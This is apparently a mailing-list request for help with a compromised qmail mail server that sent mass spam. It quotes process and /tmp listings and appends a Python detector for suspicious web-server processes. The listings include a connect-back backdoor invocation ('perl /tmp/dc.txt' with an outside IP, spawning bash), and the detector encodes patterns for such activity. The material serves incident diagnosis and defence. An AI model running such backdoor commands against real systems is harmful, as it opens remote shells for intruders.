*warning long email*
Hi all,
We have been running a Shupp toaster for about 18 months on a Redhat 9
box, and the other day it appears it was compromised by spammers. I
thought if I posted a few things I found about the system drive perhaps
someone might be able to help me figure out how/how to prevent this...
My server is a Sempron 2800+ / 1GB RAM running Redhat 9 and toaster
version .61 (not the latest I know, but I haven't been able to update it
that often)
I say "compromised" because I came in in the morning and found
40-something thousand mails in the queue. We never see more than a few
hundred. It had filled up the disk, and I noticed that they were all
mails to hotmail/yahoo/etc addresses. Bad news.
So I started looking around. I started to suspect that this was some
sort of apache / php exploit, and I noticed the following output of a ps
-ef f:
[EMAIL PROTECTED] ps -ef f
UID PID PPID C STIME TTY STAT TIME CMD
<snip>
root 3761 1 0 Jan19 ? S 0:00 /bin/sh /command/svscanboot
root 3768 3761 0 Jan19 ? S 0:49 \_ svscan /service
root 3770 3768 0 Jan19 ? S 0:00 | \_ supervise qmail-send
qmails 3792 3770 0 Jan19 ? S 3:13 | | \_ qmail-send
root 3795 3792 0 Jan19 ? S 0:05 | | \_ qmail-lspawn
qmailr 3796 3792 0 Jan19 ? S 0:20 | | \_ qmail-rspawn
qmailr 5716 3796 0 13:16 ? S 0:00 | | | \_ qmail-rem
qmailr 5719 3796 0 13:16 ? S 0:00 | | | \_ qmail-rem
qmailr 5735 3796 0 13:16 ? S 0:00 | | | \_ qmail-rem
qmailr 5757 3796 0 13:16 ? S 0:00 | | | \_ qmail-rem
qmailr 5910 3796 0 13:17 ? S 0:00 | | | \_ qmail-rem
qmailr 5951 3796 0 13:17 ? S 0:00 | | | \_ qmail-rem
qmailr 6149 3796 0 13:18 ? S 0:00 | | | \_ qmail-rem
qmailr 6233 3796 0 13:18 ? S 0:00 | | | \_ qmail-rem
qmailr 6299 3796 0 13:18 ? S 0:00 | | | \_ qmail-rem
qmailr 6388 3796 0 13:19 ? S 0:00 | | | \_ qmail-rem
qmailr 6430 3796 0 13:19 ? S 0:00 | | | \_ qmail-rem
qmailr 6560 3796 0 13:19 ? S 0:00 | | | \_ qmail-rem
qmailr 6715 3796 0 13:20 ? S 0:00 | | | \_ qmail-rem
qmailr 6846 3796 0 13:20 ? S 0:00 | | | \_ qmail-rem
qmailr 6852 3796 0 13:20 ? S 0:00 | | | \_ qmail-rem
qmailr 7133 3796 0 13:21 ? S 0:00 | | | \_ qmail-rem
qmailr 7541 3796 0 13:23 ? S 0:00 | | | \_ qmail-rem
qmailr 7563 3796 0 13:23 ? S 0:00 | | | \_ qmail-rem
qmailr 7600 3796 0 13:23 ? S 0:00 | | | \_ qmail-rem
qmailr 7614 3796 0 13:23 ? S 0:00 | | | \_ qmail-rem
qmailr 7625 3796 0 13:23 ? S 0:00 | | | \_ qmail-rem
qmailr 8169 3796 0 13:25 ? S 0:00 | | | \_ qmail-rem
qmailr 8319 3796 0 13:26 ? S 0:00 | | | \_ qmail-rem
qmailr 8446 3796 0 13:26 ? S 0:00 | | | \_ qmail-rem
qmailr 8569 3796 0 13:27 ? S 0:00 | | | \_ qmail-rem
qmailr 8681 3796 0 13:27 ? S 0:00 | | | \_ qmail-rem
qmailr 9214 3796 0 13:27 ? S 0:00 | | | \_ qmail-rem
qmailr 10366 3796 0 13:28 ? S 0:00 | | | \_ qmail-rem
qmailr 10564 3796 0 13:29 ? S 0:00 | | | \_ qmail-rem
qmailr 10760 3796 0 13:29 ? S 0:00 | | | \_ qmail-rem
qmailr 10871 3796 0 13:29 ? S 0:00 | | | \_ qmail-rem
qmailr 11544 3796 0 13:30 ? S 0:00 | | | \_ qmail-rem
qmailr 11731 3796 0 13:31 ? S 0:00 | | | \_ qmail-rem
qmailr 12238 3796 0 13:31 ? S 0:00 | | | \_ qmail-rem
qmailr 12402 3796 0 13:31 ? S 0:00 | | | \_ qmail-rem
qmailr 13074 3796 0 13:32 ? S 0:00 | | | \_ qmail-rem
qmailr 13280 3796 0 13:32 ? S 0:00 | | | \_ qmail-rem
qmailr 14385 3796 0 13:34 ? S 0:00 | | | \_ qmail-rem
qmailr 14413 3796 0 13:34 ? S 0:00 | | | \_ qmail-rem
qmailr 14576 3796 0 13:34 ? S 0:00 | | | \_ qmail-rem
qmailr 15075 3796 0 13:35 ? S 0:00 | | | \_ qmail-rem
qmailr 15081 3796 0 13:35 ? S 0:00 | | | \_ qmail-rem
qmailr 15705 3796 0 13:35 ? S 0:00 | | | \_ qmail-rem
qmailr 15933 3796 0 13:35 ? S 0:00 | | | \_ qmail-rem
qmailr 16455 3796 0 13:36 ? S 0:00 | | | \_ qmail-rem
qmailr 16458 3796 0 13:36 ? S 0:00 | | | \_ qmail-rem
qmailr 16561 3796 0 13:36 ? S 0:00 | | | \_ qmail-rem
qmailr 16598 3796 0 13:36 ? S 0:00 | | | \_ qmail-rem
qmailr 16603 3796 0 13:36 ? S 0:00 | | | \_ qmail-rem
qmailr 16605 3796 0 13:36 ? S 0:00 | | | \_ qmail-rem
qmailq 3797 3792 0 Jan19 ? S 1:32 | | \_ qmail-clean
root 3771 3768 0 Jan19 ? S 0:00 | \_ supervise log
qmaill 3778 3771 0 Jan19 ? S 0:51 | | \_ /usr/local/bin/mu
root 3772 3768 0 Jan19 ? S 0:00 | \_ supervise qmail-smtpd
vpopmail 3779 3772 0 Jan19 ? S 0:03 | | \_ /usr/local/bin/tc
root 3773 3768 0 Jan19 ? S 0:00 | \_ supervise log
qmaill 3789 3773 0 Jan19 ? S 0:02 | | \_ /usr/local/bin/mu
root 3774 3768 0 Jan19 ? S 0:00 | \_ supervise qmail-pop3d
vpopmail 3783 3774 0 Jan19 ? S 1:04 | | \_ /usr/local/bin/tc
vpopmail 16612 3783 0 13:36 ? S 0:00 | | \_ /var/qmail/bi
vpopmail 16613 16612 0 13:36 ? S 0:00 | | | \_ /var/qmai
vpopmail 16615 3783 0 13:36 ? R 0:00 | | \_ /var/qmail/bi
root 3775 3768 0 Jan19 ? S 0:00 | \_ supervise log
qmaill 3793 3775 0 Jan19 ? S 0:37 | | \_ multilog t /var/l
root 3776 3768 0 Jan19 ? S 0:00 | \_ supervise qmail-pop3d
vpopmail 3787 3776 0 Jan19 ? S 0:00 | | \_ /usr/local/bin/tc
root 3777 3768 0 Jan19 ? S 0:00 | \_ supervise log
qmaill 3788 3777 0 Jan19 ? S 0:00 | \_ multilog t /var/l
root 3769 3761 0 Jan19 ? S 0:00 \_ readproctitle service err
root 7459 1 0 Jan24 ? S 0:00 /usr/sbin/vsftpd /etc/vsftpd/
named 15414 1 0 Feb01 ? S 1:33 /usr/sbin/named -u named
root 32229 1 0 Feb02 ? S 0:00 xinetd -stayalive -pidfile /v
***
apache 29767 1 95 Feb08 ? R 1748:36 /usr/sbin/httpd
apache 32498 1 0 Feb08 ? S 0:00 sh -c perl /tmp/dc.txt 67.159
apache 32499 32498 0 Feb08 ? S 0:00 \_ perl /tmp/dc.txt 67.159.2
apache 32503 32499 0 Feb08 ? S 0:00 \_ /bin/bash
***
root 5423 1 0 09:36 ? S 0:00 /usr/local/squid/sbin/squid
squid 5425 5423 0 09:36 ? S 0:20 \_ (squid)
squid 5429 5425 0 09:37 ? S 0:00 \_ (unlinkd)
root 5433 1 0 09:37 ? S 0:01 /www/bin/httpd -DSSL
apache 5434 5433 0 09:37 ? S 0:03 \_ /www/bin/httpd -DSSL
apache 5435 5433 0 09:37 ? S 0:03 \_ /www/bin/httpd -DSSL
apache 5436 5433 0 09:37 ? S 0:03 \_ /www/bin/httpd -DSSL
apache 5437 5433 0 09:37 ? S 0:02 \_ /www/bin/httpd -DSSL
apache 5438 5433 0 09:37 ? S 0:02 \_ /www/bin/httpd -DSSL
apache 5439 5433 0 09:37 ? S 0:02 \_ /www/bin/httpd -DSSL
apache 5545 5433 0 09:37 ? S 0:02 \_ /www/bin/httpd -DSSL
apache 5549 5433 0 09:37 ? S 0:03 \_ /www/bin/httpd -DSSL
apache 5550 5433 0 09:37 ? S 0:02 \_ /www/bin/httpd -DSSL
apache 5554 5433 0 09:37 ? S 0:02 \_ /www/bin/httpd -DSSL
What caught my attention were the processes I've highlighted with the
***'s. The contents of my /tmp folder were:
[EMAIL PROTECTED] /]# ls -al /tmp/
total 2428
drwxrwxrwt 49 root root 12288 Feb 10 23:15 .
drwxr-xr-x 31 root root 4096 Feb 10 17:47 ..
-rw-r--r-- 1 apache apache 2010487 Dec 30 14:29 7.txt
-rw-r--r-- 1 apache apache 3300 Feb 8 11:53 carteiro.html
-rw-r--r-- 1 apache apache 2126 Feb 8 12:07 dc.txt
-rw-r--r-- 1 apache apache 832 Dec 19 16:15 enviar.pl
srwx------ 1 root nobody 0 Feb 9 14:33 .fam_socket
drwxrwxrwt 2 xfs xfs 4096 Jan 19 05:18 .font-unix
-rw-r--r-- 1 apache apache 0 Feb 8 08:08 .iloveyou
-rw-r--r-- 1 apache apache 127 Feb 8 08:08 .ironmaiden
-rw-r--r-- 1 apache apache 130 Feb 8 08:08 .ironmaiden2
-rw-r--r-- 1 apache apache 231623 Jan 13 15:22 lista-10.txt
I've heard of M$ viruses like "iloveyou" but I didn't think these could
harm a linux box. But these files were in my tmp directory... and the
contents of that perl script contained lines like "--== ConnectBack
Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--"
I'm not sure if I should post the whole script; if someone would like a
copy I can e-mail it, or if an operator thinks it fine I will...
That dc.txt was a looong list of e-mail addresses. As is lista-10.txt.
Granted, I'm not a very experienced linux user (PCs for 10 or so years,
Linux for only a few), but I have been following security bulletins and
best practice everywhere, changing root passwords, no shell accounts
etc., and I didn't think my system was too insecure. On a bright side, it
was a good little "stress test" to see the system hold up under 40,000+
e-mails on our connection. On a down side, potential recipients of such
an e-mail attack are not going to see things that way....
Any help anybody can provide in diagnosing this intrusion and/or
preventing it would be greatly appreciated. I will hold off on any more
detail to try to keep this e-mail under the length of an encyclopaedia.
Regards,
David
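As an added example (not part of David's mail or of the toaster itself), a small Python check that applies the pattern visible in the ps listing above: processes owned by the web-server account that run an interpreter on a script from /tmp, or an interactive shell, and whether they have been reparented to init the way the "sh -c perl /tmp/dc.txt" pair was. The account names, scratch directories and the sample listing (with a TEST-NET placeholder IP) are assumptions.

```python
import re

# Constructed sample shaped like the `ps -ef f` output quoted above (IP is a TEST-NET placeholder).
SAMPLE_PS = """\
UID PID PPID C STIME TTY STAT TIME CMD
root 3761 1 0 Jan19 ? S 0:00 /bin/sh /command/svscanboot
apache 32498 1 0 Feb08 ? S 0:00 sh -c perl /tmp/dc.txt 198.51.100.7
apache 32499 32498 0 Feb08 ? S 0:00 \\_ perl /tmp/dc.txt 198.51.100.7
apache 32503 32499 0 Feb08 ? S 0:00 \\_ /bin/bash
root 5433 1 0 09:37 ? S 0:01 /www/bin/httpd -DSSL
apache 5434 5433 0 09:37 ? S 0:03 \\_ /www/bin/httpd -DSSL
"""

WEB_USERS = {"apache", "www-data", "nobody"}        # assumption: web-server account(s) on the box
SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")  # world-writable drop locations
INTERPRETERS = {"perl", "python", "php", "ruby"}
SHELLS = {"sh", "bash", "dash"}
TREE_PREFIX = re.compile(r"^[\s|\\_]+")             # strips the `| \_` forest art from CMD

def parse_ps(text):
    # pid -> {uid, ppid, argv}; header skipped, CMD kept whole via maxsplit
    procs = {}
    for line in text.splitlines()[1:]:
        fields = line.split(None, 8)
        if len(fields) < 9:
            continue
        uid, pid, ppid, _c, _stime, _tty, _stat, _time, cmd = fields
        procs[int(pid)] = {"uid": uid, "ppid": int(ppid),
                           "argv": TREE_PREFIX.sub("", cmd).split()}
    return procs

def reasons_for(proc, procs):
    argv = proc["argv"]
    if len(argv) >= 3 and argv[0].rsplit("/", 1)[-1] in SHELLS and argv[1] == "-c":
        argv = argv[2:]                      # inspect the command wrapped by `sh -c`
    prog, reasons = argv[0].rsplit("/", 1)[-1], []
    if prog in INTERPRETERS and any(a.startswith(SCRATCH_DIRS) for a in argv[1:]):
        reasons.append("interpreter running a script from a scratch directory")
    elif prog in SHELLS:
        reasons.append("interactive shell under the web-server account")
    if reasons and (proc["ppid"] == 1 or proc["ppid"] not in procs):
        reasons.append("detached from httpd (reparented to init)")
    return reasons

def find_suspicious(ps_text):
    # returns [(pid, command line, reasons)] for web-user processes worth a look
    procs, hits = parse_ps(ps_text), []
    for pid, proc in sorted(procs.items()):
        if proc["uid"] in WEB_USERS and proc["argv"] and (why := reasons_for(proc, procs)):
            hits.append((pid, " ".join(proc["argv"]), why))
    return hits
```

Note that mounting /tmp noexec would not have stopped `perl /tmp/dc.txt`, because the interpreter reads the file rather than the kernel executing it; the durable fix is closing whatever let the apache account write and run that script in the first place.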